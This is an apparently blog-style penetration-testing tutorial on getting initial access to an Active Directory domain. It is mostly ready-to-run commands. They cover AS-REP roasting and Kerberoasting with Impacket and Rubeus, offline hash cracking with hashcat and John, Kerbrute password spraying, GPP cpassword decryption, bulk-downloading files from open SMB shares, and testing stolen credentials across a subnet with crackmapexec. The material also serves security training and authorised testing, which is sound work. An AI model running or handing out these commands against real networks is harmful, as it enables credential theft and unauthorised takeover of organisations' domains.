/ Active-Directory, AD - Attack Chain, Uncategorized / By

Active Directory Exploitation – Gaining Initial Access from Enumeration

Once you’ve mapped out the environment — users, SPNs, shares, and trust relationships — the next step is to exploit weaknesses that lead to initial access or valid credentials. This phase focuses on common and powerful Active Directory exploitation techniques that pentesters use to break in.

The Goal of This Phase

Your goal here is to move from:

  • No access → Valid domain user credentials
  • Low-priv user → Higher-privileged domain account (but not yet Domain Admin)
  • Enumerated data → Cracked passwords, reusable hashes, or cleartext creds

Techniques Covered in This Phase

  • AS-REP Roasting
  • Kerberoasting
  • Password Spraying (Kerbrute + CrackMapExec)
  • Brute Force via Kerberos
  • Exploiting Open SMB Shares
  • Exploiting Leaked Passwords in SYSVOL or GPP

1. AS-REP Roasting

Target users who have “Do not require Kerberos preauthentication” enabled. These users can be roasted even without valid credentials.

Step 1: Enumerate Usernames

You need a valid list of usernames to test.

kerbrute userenum -d corp.local usernames.txt --dc 192.168.56.101
# Enumerates valid usernames against the DC

Step 2: Use getnpusers.py from Impacket

getnpusers.py corp.local/ -no-pass -usersfile usernames.txt -dc-ip 192.168.56.101
# Requests AS-REP responses for accounts without pre-auth

Output:

You’ll get AS-REP hashes in a format compatible with Hashcat.

Step 3: Crack the Hash

hashcat -m 18200 asrep_hashes.txt rockyou.txt --force
# 18200 = Kerberos 5 AS-REP hash type

Example

Let’s say the domain is corp.local and you discover a user svc_backup doesn’t require pre-auth. You run:

getnpusers.py corp.local/ -no-pass -usersfile users.txt -dc-ip 192.168.56.101

You get:

$krb5asrep$23$svc_backup@CORP.LOCAL:...

This is the AS-REP hash. Copy it into a .txt file and crack it with:

hashcat -m 18200 asrep_hashes.txt rockyou.txt --force

Boom! You now have the password for svc_backup, and if it’s a privileged account, you might have just cracked the AD wide open.

OR INSIDE THE DOMAIN

AS-REP Roasting (PowerView + Rubeus + John)

# 1. Load PowerView with execution policy bypassed
powershell -ep bypass
. .\PowerView.ps1

# 2. Find users with 'Do not require preauthentication'
Get-DomainUser | Where-Object { $_.UserAccountControl -like "*DONT_REQ_PREAUTH*" }

# 3. Dump AS-REP hashes using Rubeus
.\Rubeus.exe asreproast /user:johnny /outfile:johnhash.txt

# 4. Crack the hash using JohnTheRipper
john.exe johnhash.txt --format=krb5asrep --wordlist=10k-worst-pass.txt

2. Kerberoasting

Kerberoasting is a post-exploitation attack that lets you extract service account hashes (TGS tickets) from Active Directory and crack them offline — often revealing cleartext passwords for privileged accounts.

Why It Works:

  • Any authenticated user can request service tickets for SPNs
  • Tickets are encrypted with the service account’s NTLM hash
  • Weak passwords = offline cracking success

The Goal

The goal of Kerberoasting is to get cleartext credentials for service accounts. Why?

Because:

  • Many service accounts are over-privileged (e.g., domain admins, local admins)
  • They often have static passwords that don’t expire
  • Their passwords are frequently reused elsewhere

FROM INSIDE THE DOMAIN

1. Find Roastable Accounts with PowerView

Import-Module .\PowerView.ps1
Get-DomainUser -SPN
# Lists all accounts with SPNs that can be roasted

2. Dump TGS Hashes with Rubeus

.\Rubeus.exe kerberoast
# Finds SPNs and dumps crackable Kerberos TGS hashes

Optional: output to file

.\Rubeus.exe kerberoast /outfile:hashes.txt

OR FROM OUTSIDE THE DOMAIN

3. Using Impacket (Linux/Kali)

GetUserSPNs.py corp.local/user:Password123 -dc-ip 192.168.56.101 -request
# Authenticates and dumps TGS hashes for SPNs

4. Crack the Hash (Offline)

hashcat -m 13100 hashes.txt rockyou.txt --force
# 13100 = Kerberos 5 TGS-REP (etype 23)

Or with John:

john --wordlist=rockyou.txt hashes.txt

3. Password Spraying (Kerberos)

If you have a list of usernames, try spraying with a common password.

Using Kerbrute:

kerbrute passwordspray -d corp.local --dc 192.168.56.101 users.txt /usr/share/wordlists/rockyou.txt

Tip: Spray slowly to avoid account lockouts. Set limits like 1 attempt per user every 15-30 minutes.

4. Cracking Leaked GPP Passwords (Group Policy Preferences)

Older domains may contain saved credentials in SYSVOL:

smbclient //192.168.56.101/SYSVOL -N

Search for:

Groups.xml

Decrypt using GPP-decrypt:

gpp-decrypt <cpassword>

You might get a reusable local or domain password.

5. Exploiting Open Shares

Explore accessible SMB shares:

smbclient -L //192.168.56.101 -N

If you find file shares like IT, Backups, Scripts, or SYSVOL, look for:

  • .ps1 or .bat scripts with hardcoded creds
  • KeePass databases
  • .rdp or .txt files with login info

Mount the share and search:

smbclient //192.168.56.101/IT -U user
recurse ON
prompt OFF
mget *

6. Using Valid Credentials to Enumerate Further

Once you have valid creds, test them across the network:

crackmapexec smb 192.168.56.0/24 -u user -p 'Password123'
# Checks where credentials work

What Counts as a Win in This Phase?

  • You crack a Kerberoasted or AS-REP hash
  • You extract creds from GPP, SYSVOL, or open shares
  • You obtain a valid domain account via spraying or brute force
  • You discover an SPN account with a weak password and access it

From here, you’re ready to move laterally or escalate domain privileges — which is what we’ll cover next.

Summary

TechniqueToolOutcome
AS-REP Roastinggetnpusers.py / RubeusCracked hash of pre-auth-disabled user
KerberoastingRubeus / GetUserSPNs.pyCracked hash of SPN service account
Password SprayKerbruteLow-priv domain user creds
GPP Exploitsmbclient + gpp-decryptCleartext local/domain creds
Share EnumerationsmbclientCredential exposure or lateral move

Next up: Phase 4 – Lateral Movement, where we use those hard-earned creds to pivot through the domain.

Related Posts

Scroll to Top